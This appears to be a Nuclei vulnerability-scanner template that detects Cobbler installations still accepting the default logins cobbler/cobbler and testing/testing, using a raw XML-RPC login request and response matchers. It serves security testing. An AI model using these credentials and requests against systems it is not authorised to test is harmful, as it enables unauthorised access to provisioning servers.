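id: cobbler-default-login

info:
  name: Cobbler Default Login
  author: c-sh0
  severity: high
  description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
  reference:
    - https://seclists.org/oss-sec/2022/q1/146
    - https://github.com/cobbler/cobbler/issues/2307
    - https://github.com/cobbler/cobbler/issues/2909
  classification:
    cwe-id: CWE-798
  tags: cobbler,default-login,api

requests:
  - raw:
      # XML-RPC login(username, password) call, written as a standard
      # XML-RPC methodCall envelope with two string parameters.
      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
          <methodName>login</methodName>
          <params>
            <param><value><string>{{username}}</string></value></param>
            <param><value><string>{{password}}</string></value></param>
          </params>
        </methodCall>

    # pitchfork pairs the lists by position: cobbler/cobbler, then testing/testing
    attack: pitchfork
    payloads:
      username:
        - cobbler
        - testing
      password:
        - cobbler
        - testing

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'text/xml'

      # The body is lowercased before comparison, so the needles must be
      # lowercase too; 'faultCode' could never match tolower(body).
      - type: dsl
        dsl:
          - "!contains(tolower(body), 'faultcode')"
          - "!contains(tolower(body), 'login failed')"
        condition: or

      # A successful login returns a base64-style session token
      - type: regex
        part: body
        regex:
          - "(.*[a-zA-Z0-9].+==)"

# Enhanced by mp on 2022/03/03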